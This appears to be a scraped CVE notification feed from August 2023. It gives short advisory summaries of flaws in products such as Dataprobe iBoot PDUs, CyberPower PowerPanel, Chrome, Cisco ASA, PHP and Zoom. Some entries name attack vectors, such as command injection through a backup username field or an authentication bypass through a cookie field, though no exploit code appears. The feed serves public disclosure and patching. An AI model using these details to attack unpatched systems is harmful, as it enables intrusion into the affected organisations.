🚨 CVE-2023-3264The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier is vulnerable to authentication bypass in the REST API due to the mishandling of special characters when parsing credentials.Successful exploitation allows the malicious agent to obtain a valid authorization token and read information relating to the state of the relays and power distribution.🎖@cveNotify |
|
| 2023-08-14 15:58:29 |
🚨 CVE-2023-3266A non-feature complete authentication mechanism exists in the production application allowing an attacker to bypass all authentication checks if LDAP authentication is selected.An unauthenticated attacker can leverage this vulnerability to log in to the CypberPower PowerPanel Enterprise as an administrator by selecting LDAP authentication from a hidden HTML combo box. Successful exploitation of this vulnerability also requires the attacker to know at least one username on the device, but any password will authenticate successfully.🎖@cveNotify |
|
| 2023-08-14 15:58:28 |
🚨 CVE-2023-3267When adding a remote backup location, an authenticated user can pass arbitrary OS commands through the username field. The username is passed without sanitization into CMD running as NT/Authority System. An authenticated attacker can leverage this vulnerability to execute arbitrary code with system-level access to the CyberPower PowerPanel Enterprise server.🎖@cveNotify |
|
| 2023-08-14 15:58:25 |
🚨 CVE-2023-40303GNU inetutils through 2.4 may allow privilege escalation because of unchecked return values of set*id() family functions in ftpd, rcp, rlogin, rsh, rshd, and uucpd. This is, for example, relevant if the setuid system call fails when a process is trying to drop privileges before letting an ordinary user control the activities of the process.🎖@cveNotify |
|
| 2023-08-14 15:58:24 |
🚨 CVE-2023-40274An issue was discovered in zola 0.13.0 through 0.17.2. The custom implementation of a web server, available via the "zola serve" command, allows directory traversal. The handle_request function, used by the server to process HTTP requests, does not account for sequences of special path control characters (../) in the URL when serving a file, which allows one to escape the webroot of the server and read arbitrary files from the filesystem.🎖@cveNotify |
|
| 2023-08-14 15:58:23 |
🚨 CVE-2023-3259The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier is vulnerable to authentication bypass. By manipulating the IP address field in the "iBootPduSiteAuth" cookie, a malicious agent can direct the device to connect to a rouge database.Successful exploitation allows the malicious agent to take actions with administrator privileges including, but not limited to, manipulating power levels, modifying user accounts, and exporting confidential user information🎖@cveNotify |
|
| 2023-08-14 15:58:19 |
🚨 CVE-2023-3260When adding a remote backup location, an authenticated user can pass arbitrary OS commands through the username field. The username is passed without sanitization into CMD running as NT/Authority System. An authenticated attacker can leverage this vulnerability to execute arbitrary code with system-level access to the CyberPower PowerPanel Enterprise server.🎖@cveNotify |
|
| 2023-08-14 15:58:18 |
🚨 CVE-2023-3262The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier uses hard-coded credentials for all interactions with the internal Postgres database.A malicious agent with the ability to execute operating system commands on the device can leverage this vulnerability to read, modify, or delete arbitrary database records.🎖@cveNotify |
|
| 2023-08-14 15:58:17 |
🚨 CVE-2023-40292Harman Infotainment 20190525031613 and later discloses the IP address via CarPlay CTRL packets.🎖@cveNotify |
|
| 2023-08-13 23:58:13 |
🚨 CVE-2023-23208Genesys Administrator Extension (GAX) before 9.0.105.15 is vulnerable to Cross Site Scripting (XSS) via the Business Structure page of the iWD plugin, aka GAX-11261.🎖@cveNotify |
|
| 2023-08-13 23:58:12 |
🚨 CVE-2020-13654XWiki Platform before 12.8 mishandles escaping in the property displayer.🎖@cveNotify |
|
| 2023-08-13 20:58:12 |
🚨 CVE-2023-32627A floating point exception vulnerability was found in sox, in the read_samples function at sox/src/voc.c:334:18. This flaw can lead to a denial of service.🎖@cveNotify |
|
| 2023-08-13 20:58:11 |
🚨 CVE-2023-2255Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.🎖@cveNotify |
|
| 2023-08-13 15:58:37 |
🚨 CVE-2023-39398Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:36 |
🚨 CVE-2023-39399Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:35 |
🚨 CVE-2023-39400Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:34 |
🚨 CVE-2023-39401Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:33 |
🚨 CVE-2023-39402Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:30 |
🚨 CVE-2023-39403Parameter verification vulnerability in the installd module. Successful exploitation of this vulnerability may cause sandbox files to be read and written without authorization.🎖@cveNotify |
|
| 2023-08-13 15:58:29 |
🚨 CVE-2023-39406Permission control vulnerability in the XLayout component. Successful exploitation of this vulnerability may cause apps to forcibly restart.🎖@cveNotify |
|
| 2023-08-13 15:58:28 |
🚨 CVE-2023-39380Permission control vulnerability in the audio module. Successful exploitation of this vulnerability may cause audio devices to perform abnormally.🎖@cveNotify |
|
| 2023-08-13 15:58:24 |
🚨 CVE-2023-39381 Input verification vulnerability in the storage module. Successful exploitation of this vulnerability may cause the device to restart.🎖@cveNotify |
|
| 2023-08-13 15:58:23 |
🚨 CVE-2023-39383Vulnerability of input parameters being not strictly verified in the AMS module. Successful exploitation of this vulnerability may compromise apps' data security.🎖@cveNotify |
|
| 2023-08-13 15:58:22 |
🚨 CVE-2023-39388Vulnerability of input parameters being not strictly verified in the PMS module. Successful exploitation of this vulnerability may cause home screen unavailability.🎖@cveNotify |
|
| 2023-08-13 15:58:18 |
🚨 CVE-2023-39389Vulnerability of input parameters being not strictly verified in the PMS module. Successful exploitation of this vulnerability may cause home screen unavailability.🎖@cveNotify |
|
| 2023-08-13 15:58:17 |
🚨 CVE-2023-39392Vulnerability of insecure signatures in the OsuLogin module. Successful exploitation of this vulnerability may cause OsuLogin to be maliciously modified and overwritten.🎖@cveNotify |
|
| 2023-08-13 15:58:16 |
🚨 CVE-2023-39393Vulnerability of insecure signatures in the ServiceWifiResources module. Successful exploitation of this vulnerability may cause ServiceWifiResources to be maliciously modified and overwritten.🎖@cveNotify |
|
| 2023-08-13 15:58:15 |
🚨 CVE-2023-39396Deserialization vulnerability in the input module. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-08-13 15:58:14 |
🚨 CVE-2023-39405Vulnerability of out-of-bounds parameter read/write in the Wi-Fi module. Successful exploitation of this vulnerability may cause other apps to be executed with escalated privileges.🎖@cveNotify |
|
| 2023-08-13 01:03:57 |
🚨 CVE-2023-4265Potential buffer overflow vulnerabilities in the following locations: https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/usb/device/usb_dc_native_posix.c#L359 https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/usb/device/usb_dc_native_posix.c#L359 https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/usb/device/class/netusb/function_rndis... https://github.com/zephyrproject-rtos/zephyr/blob/main/subsys/usb/device/class/netusb/function_rndis.c#L841 🎖@cveNotify |
|
| 2023-08-12 13:08:12 |
🚨 CVE-2023-3824In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 🎖@cveNotify |
|
| 2023-08-12 13:08:11 |
🚨 CVE-2023-4068Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:08:10 |
🚨 CVE-2023-4070Type Confusion in V8 in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:08:06 |
🚨 CVE-2023-3737Inappropriate implementation in Notifications in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to spoof the contents of media notifications via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-12 13:08:05 |
🚨 CVE-2023-3738Inappropriate implementation in Autofill in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-12 13:08:04 |
🚨 CVE-2023-3734Inappropriate implementation in Picture In Picture in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-12 13:08:00 |
🚨 CVE-2023-3732Out of bounds memory access in Mojo in Google Chrome prior to 115.0.5790.98 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:07:59 |
🚨 CVE-2023-3727Use after free in WebRTC in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:07:58 |
🚨 CVE-2023-3728Use after free in WebRTC in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:07:55 |
🚨 CVE-2023-3730Use after free in Tab Groups in Google Chrome prior to 115.0.5790.98 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 13:07:54 |
🚨 CVE-2023-38559A buffer overflow flaw was found in base/gdevdevn.c:1973 in devn_pcx_write_rle() in ghostscript. This issue may allow a local attacker to cause a denial of service via outputting a crafted PDF file for a DEVN device with gs.🎖@cveNotify |
|
| 2023-08-12 13:07:53 |
🚨 CVE-2022-4918Use after free in UI in Google Chrome prior to 102.0.5005.61 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-12 13:07:52 |
🚨 CVE-2022-4919Use after free in Base Internals in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-08-12 05:58:19 |
🚨 CVE-2022-40982Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-08-12 05:58:15 |
🚨 CVE-2022-41804Unauthorized error injection in Intel(R) SGX or Intel(R) TDX for some Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-08-12 05:58:14 |
🚨 CVE-2023-20569A side channel vulnerability on some of the AMD CPUs may allow an attacker to influence the return address prediction. This may result in speculative execution at an attacker-controlled?address, potentially leading to information disclosure.🎖@cveNotify |
|
| 2023-08-12 05:58:13 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before 3.11.4 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-08-12 00:58:20 |
🚨 CVE-2023-36314There is a Cross Site Scripting (XSS) vulnerability in the value-text-o_sms_email_request_message parameters of index.php in PHPJabbers Callback Widget v1.0.🎖@cveNotify |
|
| 2023-08-12 00:58:19 |
🚨 CVE-2023-36313PHPJabbers Document Creator v1.0 is vulnerable to Cross Site Scripting (XSS) via all post parameters of "Export Requests" aside from "request_feed".🎖@cveNotify |
|
| 2023-08-12 00:58:14 |
🚨 CVE-2023-4202Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface.🎖@cveNotify |
|
| 2023-08-12 00:58:13 |
🚨 CVE-2023-3569In PHOENIX CONTACTs TC ROUTER and TC CLOUD CLIENT in versions prior to 2.07.2 as well as CLOUD CLIENT 1101T-TX/TX prior to 2.06.10 an authenticated remote attacker with admin privileges could upload a crafted XML file which causes a denial-of-service.🎖@cveNotify |
|
| 2023-08-11 21:58:44 |
🚨 CVE-2023-38691matrix-appservice-bridge provides an API for setting up bridges. Starting in version 4.0.0 and prior to versions 8.1.2 and 9.0.1, a malicious Matrix server can use a foreign user's MXID in an OpenID exchange, allowing a bad actor to impersonate users when using the provisioning API. The library does not check that the servername part of the `sub` parameter (containing the user's *claimed* MXID) is the the same as the servername we are talking to. A malicious actor could spin up a server on any given domain, respond with a `sub` parameter according to the user they want to act as and use the resulting token to perform provisioning requests. Versions 8.1.2 and 9.0.1 contain a patch. As a workaround, disable the provisioning API.🎖@cveNotify |
|
| 2023-08-11 21:58:43 |
🚨 CVE-2023-0179A buffer overflow vulnerability was found in the Netfilter subsystem in the Linux Kernel. This issue could allow the leakage of both stack and heap addresses, and potentially allow Local Privilege Escalation to the root user via arbitrary code execution.🎖@cveNotify |
|
| 2023-08-11 21:58:42 |
🚨 CVE-2017-3807A vulnerability in Common Internet Filesystem (CIFS) code in the Clientless SSL VPN functionality of Cisco ASA Software, Major Releases 9.0-9.6, could allow an authenticated, remote attacker to cause a heap overflow. The vulnerability is due to insufficient validation of user supplied input. An attacker could exploit this vulnerability by sending a crafted URL to the affected system. An exploit could allow the remote attacker to cause a reload of the affected system or potentially execute code. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 or IPv6 traffic. A valid TCP connection is needed to perform the attack. The attacker needs to have valid credentials to log in to the Clientless SSL VPN portal. Vulnerable Cisco ASA Software running on the following products may be affected by this vulnerability: Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco ASA for Firepower 9300 Series, Cisco ASA for Firepower 4100 Series. Cisco Bug IDs: CSCvc23838.🎖@cveNotify |
|
| 2023-08-11 21:58:38 |
🚨 CVE-2019-1934A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to elevate privileges and execute administrative functions on an affected device. The vulnerability is due to insufficient authorization validation. An attacker could exploit this vulnerability by logging in to an affected device as a low-privileged user and then sending specific HTTPS requests to execute administrative functions using the information retrieved during initial login.🎖@cveNotify |
|
| 2023-08-11 21:58:37 |
🚨 CVE-2016-6367Cisco Adaptive Security Appliance (ASA) Software before 8.4(1) on ASA 5500, ASA 5500-X, PIX, and FWSM devices allows local users to gain privileges via invalid CLI commands, aka Bug ID CSCtu74257 or EPICBANANA.🎖@cveNotify |
|
| 2023-08-11 21:58:36 |
🚨 CVE-2017-3793A vulnerability in the TCP normalizer of Cisco Adaptive Security Appliance (ASA) Software (8.0 through 8.7 and 9.0 through 9.6) and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause Cisco ASA and FTD to drop any further incoming traffic on all interfaces, resulting in a denial of service (DoS) condition. The vulnerability is due to improper limitation of the global out-of-order TCP queue for specific block sizes. An attacker could exploit this vulnerability by sending a large number of unique permitted TCP connections with out-of-order segments. An exploit could allow the attacker to exhaust available blocks in the global out-of-order TCP queue, causing the dropping of any further incoming traffic on all interfaces and resulting in a DoS condition. Cisco Bug IDs: CSCvb46321.🎖@cveNotify |
|
| 2023-08-11 21:58:33 |
🚨 CVE-2013-5515The Clientless SSL VPN feature in Cisco Adaptive Security Appliance (ASA) Software 8.x before 8.2(5.44), 8.3.x before 8.3(2.39), 8.4.x before 8.4(5.7), 8.6.x before 8.6(1.12), 9.0.x before 9.0(2.6), and 9.1.x before 9.1(1.7) allows remote attackers to cause a denial of service (device reload) via crafted HTTPS requests, aka Bug ID CSCua22709.🎖@cveNotify |
|
| 2023-08-11 21:58:32 |
🚨 CVE-2013-5568The auto-update implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 and earlier allows remote attackers to cause a denial of service (device reload) via crafted update data, aka Bug ID CSCui33308.🎖@cveNotify |
|
| 2023-08-11 21:58:31 |
🚨 CVE-2016-6431A vulnerability in the local Certificate Authority (CA) feature of Cisco ASA Software before 9.6(1.5) could allow an unauthenticated, remote attacker to cause a reload of the affected system. The vulnerability is due to improper handling of crafted packets during the enrollment operation. An attacker could exploit this vulnerability by sending a crafted enrollment request to the affected system. An exploit could allow the attacker to cause the reload of the affected system. Note: Only HTTPS packets directed to the Cisco ASA interface, where the local CA is allowing user enrollment, can be used to trigger this vulnerability. This vulnerability affects systems configured in routed firewall mode and in single or multiple context mode.🎖@cveNotify |
|
| 2023-08-11 21:58:27 |
🚨 CVE-2012-5717Cisco Adaptive Security Appliances (ASA) devices with firmware 8.x through 8.4(1) do not properly manage SSH sessions, which allows remote authenticated users to cause a denial of service (device crash) by establishing multiple sessions, aka Bug ID CSCtc59462.🎖@cveNotify |
|
| 2023-08-11 21:58:26 |
🚨 CVE-2013-5511The Adaptive Security Device Management (ASDM) remote-management feature in Cisco Adaptive Security Appliance (ASA) Software 8.2.x before 8.2(5.46), 8.3.x before 8.3(2.39), 8.4.x before 8.4(6), 8.5.x before 8.5(1.18), 8.6.x before 8.6(1.12), 8.7.x before 8.7(1.7), 9.0.x before 9.0(3.1), and 9.1.x before 9.1(2.6) does not properly implement the authentication-certificate option, which allows remote attackers to bypass authentication via a TCP session to an ASDM interface, aka Bug ID CSCuh44815.🎖@cveNotify |
|
| 2023-08-11 21:58:25 |
🚨 CVE-2015-6327The IKEv1 implementation in Cisco Adaptive Security Appliance (ASA) software 7.2 and 8.2 before 8.2(5.58), 8.3 and 8.4 before 8.4(7.29), 8.5 through 8.7 before 8.7(1.17), 9.0 before 9.0(4.37), 9.1 before 9.1(6.8), 9.2 before 9.2(4), and 9.3 before 9.3(3) allows remote attackers to cause a denial of service (device reload) via crafted ISAKMP UDP packets, aka Bug ID CSCus94026.🎖@cveNotify |
|
| 2023-08-11 18:58:40 |
🚨 CVE-2022-48580A command injection vulnerability exists in the ARP ping device tool feature of the ScienceLogic SL1 that takes unsanitized user controlled input and passes it directly to a shell command. This allows for the injection of arbitrary commands to the underlying operating system.🎖@cveNotify |
|
| 2023-08-11 18:58:39 |
🚨 CVE-2023-31448An issue was discovered in Paessler PRTG Network Monitor 23.2.83.1760 x64. To exploit the vulnerability, a authenticated user can create a HL7 Sensor. When creating this sensor, the user can set the HL7 message that should be sent from the PRTG device. This input parameter contains a path traversal vulnerability that allows an attacker to choose arbitrary files from the system.🎖@cveNotify |
|
| 2023-08-11 18:58:38 |
🚨 CVE-2023-4203Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the ping tool of the web-interface.🎖@cveNotify |
|
| 2023-08-11 18:58:37 |
🚨 CVE-2023-4202Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the device name field of the web-interface.🎖@cveNotify |
|
| 2023-08-11 18:58:36 |
🚨 CVE-2023-38167Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-11 18:58:32 |
🚨 CVE-2023-38172Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-08-11 18:58:31 |
🚨 CVE-2023-38347An issue was discovered in LWsystems Benno MailArchiv 2.10.1. Attackers can cause XSS via JavaScript content to a mailbox.🎖@cveNotify |
|
| 2023-08-11 18:58:30 |
🚨 CVE-2023-0871XXE injection in /rtc/post/ endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to XML external entity (XXE) injection, which can be used for instance to force Horizon to make arbitrary HTTP requests to internal and external services. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.🎖@cveNotify |
|
| 2023-08-11 18:58:29 |
🚨 CVE-2022-48603A SQL injection vulnerability exists in the “message viewer iframe” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-11 18:58:28 |
🚨 CVE-2023-36914Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-08-11 18:58:24 |
🚨 CVE-2022-48598A SQL injection vulnerability exists in the “reporter events type date” feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.🎖@cveNotify |
|
| 2023-08-11 18:58:23 |
🚨 CVE-2023-39218Client-side enforcement of server-side security in Zoom clients before 5.14.10 may allow a privileged user to enable information disclosure via network access.🎖@cveNotify |
|
| 2023-08-11 18:58:22 |
🚨 CVE-2022-48581A command injection vulnerability exists in the “dash export” feature of the ScienceLogic SL1 that takes unsanitized user controlled input and passes it directly to a shell command. This allows for the injection of arbitrary commands to the underlying operating system.🎖@cveNotify |
|
| 2023-08-11 18:58:21 |
🚨 CVE-2023-34545A SQL injection vulnerability in CSZCMS 1.3.0 allows remote attackers to run arbitrary SQL commands via p parameter or the search URL.🎖@cveNotify |
|
| 2023-08-11 18:58:20 |
🚨 CVE-2023-38758Cross Site Scripting vulnerability in wger Project wger Workout Manager v.2.2.0a3 allows a remote attacker to gain privileges via the license_author field in the add-ingredient function in the templates/ingredients/view.html, models/ingredients.py, and views/ingredients.py components.🎖@cveNotify |
|
| 2023-08-11 18:58:16 |
🚨 CVE-2023-39217Improper input validation in Zoom SDK’s before 5.14.10 may allow an unauthenticated user to enable a denial of service via network access.🎖@cveNotify |
|
| 2023-08-11 18:58:15 |
🚨 CVE-2023-39216Improper input validation in Zoom Desktop Client for Windows before 5.14.7 may allow an unauthenticated user to enable an escalation of privilege via network access.🎖@cveNotify |
|
| 2023-08-11 18:58:14 |
🚨 CVE-2023-3522Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in a2 License Portal System allows SQL Injection.This issue affects License Portal System: before 1.48.🎖@cveNotify |
|
| 2023-08-11 18:58:13 |
🚨 CVE-2023-38759Cross Site Request Forgery (CSRF) vulnerability in wger Project wger Workout Manager 2.2.0a3 allows a remote attacker to gain privileges via the user-management feature in the gym/views/gym.py, templates/gym/reset_user_password.html, templates/user/overview.html, core/views/user.py, and templates/user/preferences.html, core/forms.py components.🎖@cveNotify |
|
| 2023-08-11 16:58:37 |
🚨 CVE-2020-28848CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.🎖@cveNotify |
|
| 2023-08-11 16:58:36 |
🚨 CVE-2020-23595Cross Site Request Forgery (CSRF) vulnerability in yzmcms version 5.6, allows remote attackers to escalate privileges and gain sensitive information sitemodel/add.html endpoint.🎖@cveNotify |
|
| 2023-08-11 16:58:35 |
🚨 CVE-2020-24221An issue was discovered in GetByte function in miniupnp ngiflib version 0.4, allows local attackers to cause a denial of service (DoS) via crafted .gif file (infinite loop).🎖@cveNotify |
|
| 2023-08-11 16:58:34 |
🚨 CVE-2020-19952Cross Site Scripting (XSS) vulnerability in Rendering Engine in jbt Markdown Editor thru commit 2252418c27dffbb35147acd8ed324822b8919477, allows remote attackers to execute arbirary code via crafted payload or opening malicious .md file.🎖@cveNotify |
|
| 2023-08-11 16:58:31 |
🚨 CVE-2020-25915Cross Site Scripting (XSS) vulnerability in UserController.php in ThinkCMF version 5.1.5, allows attackers to execute arbitrary code via crafted user_login.🎖@cveNotify |
|
| 2023-08-11 16:58:30 |
🚨 CVE-2020-27449Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.🎖@cveNotify |
|
| 2023-08-11 16:58:29 |
🚨 CVE-2020-24922Cross Site Request Forgery (CSRF) vulnerability in xxl-job-admin/user/add in xuxueli xxl-job version 2.2.0, allows remote attackers to execute arbitrary code and esclate privileges via crafted .html file.🎖@cveNotify |
|
| 2023-08-11 16:58:25 |
🚨 CVE-2020-24950SQL Injection vulnerability in file Base_module_model.php in Daylight Studio FUEL-CMS version 1.4.9, allows remote attackers to execute arbitrary code via the col parameter to function list_items.🎖@cveNotify |
|
| 2023-08-11 16:58:24 |
🚨 CVE-2020-27514Directory Traversal vulnerability in delete function in admin.api.TemplateController in ZrLog version 2.1.15, allows remote attackers to delete arbitrary files and cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-08-11 16:58:23 |
🚨 CVE-2020-28849Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module.🎖@cveNotify |
|
| 2023-08-11 16:58:19 |
🚨 CVE-2020-35141An issue was discovered in OFPQueueGetConfigReply in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).🎖@cveNotify |
|
| 2023-08-11 16:58:18 |
🚨 CVE-2020-35990Buffer Overflow vulnerability in cFilenameInit parameter in browseForDoc function in Foxit Software Foxit PDF Reader version 10.1.0.37527, allows local attackers to cause a denial of service (DoS) via crafted .pdf file.🎖@cveNotify |
|
| 2023-08-11 16:58:17 |
🚨 CVE-2020-36024An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.🎖@cveNotify |
|
| 2023-08-11 16:58:16 |
🚨 CVE-2020-36034SQL Injection vulnerability in oretnom23 School Faculty Scheduling System version 1.0, allows remote attacker to execute arbitrary code, escalate privilieges, and gain sensitive information via crafted payload to id parameter in manage_user.php.🎖@cveNotify |
|
| 2023-08-11 13:58:11 |
🚨 CVE-2023-26309A remote code execution vulnerability in the webview component of OnePlus Store app.🎖@cveNotify |
|
| 2023-08-11 10:58:34 |
🚨 CVE-2023-39553Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider.Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook giving an opportunity to read files on the Airflow server.This issue affects Apache Airflow Drill Provider: before 2.4.3.It is recommended to upgrade to a version that is not affected.🎖@cveNotify |
|
| 2023-08-11 10:58:33 |
🚨 CVE-2023-40254Download of Code Without Integrity Check vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Malicious Software Update.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-11 10:58:29 |
🚨 CVE-2023-40267GitPython before 3.1.32 does not block insecure non-multi options in clone and clone_from. NOTE: this issue exists because of an incomplete fix for CVE-2022-24439.🎖@cveNotify |
|
| 2023-08-11 10:58:27 |
🚨 CVE-2023-4105Mattermost fails to delete the attachments when deleting a message in a thread allowing a simple user to still be able to access and download the attachment of a deleted message🎖@cveNotify |
|
| 2023-08-11 10:58:26 |
🚨 CVE-2023-4107Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name.🎖@cveNotify |
|
| 2023-08-11 10:58:25 |
🚨 CVE-2023-4108Mattermost fails to sanitize post metadata during audit logging resulting in permalinks contents being logged🎖@cveNotify |
|
| 2023-08-11 10:58:21 |
🚨 CVE-2023-3823In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8 various XML functions rely on libxml global state to track configuration variables, like whether external entities are loaded. This state is assumed to be unchanged unless the user explicitly changes it by calling appropriate function. However, since the state is process-global, other modules - such as ImageMagick - may also use this library within the same process, and change that global state for their internal purposes, and leave it in a state where external entities loading is enabled. This can lead to the situation where external XML is parsed with external entities loaded, which can lead to disclosure of any local files accessible to PHP. This vulnerable state may persist in the same process across many requests, until the process is shut down. 🎖@cveNotify |
|
| 2023-08-11 10:58:20 |
🚨 CVE-2023-3824In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 🎖@cveNotify |
|
| 2023-08-11 10:58:19 |
🚨 CVE-2023-40253Improper Authentication vulnerability in Genians Genian NAC V4.0, Genians Genian NAC V5.0, Genians Genian NAC Suite V5.0, Genians Genian ZTNA allows Functionality Misuse.This issue affects Genian NAC V4.0: from V4.0.0 through V4.0.155; Genian NAC V5.0: from V5.0.0 through V5.0.42 (Revision 117460); Genian NAC Suite V5.0: from V5.0.0 through V5.0.54; Genian ZTNA: from V6.0.0 through V6.0.15.🎖@cveNotify |
|
| 2023-08-11 10:58:18 |
🚨 CVE-2023-40260EmpowerID before 7.205.0.1 allows an attacker to bypass an MFA (multi factor authentication) requirement if the first factor (username and password) is known, because the first factor is sufficient to change an account's email address, and the product would then send MFA codes to the new email address (which may be attacker-controlled). NOTE: this is different from CVE-2023-4177, which claims to be about "some unknown processing of the component Multi-Factor Authentication Code Handler" and thus cannot be correlated with other vulnerability information.🎖@cveNotify |
|
| 2023-08-11 10:58:17 |
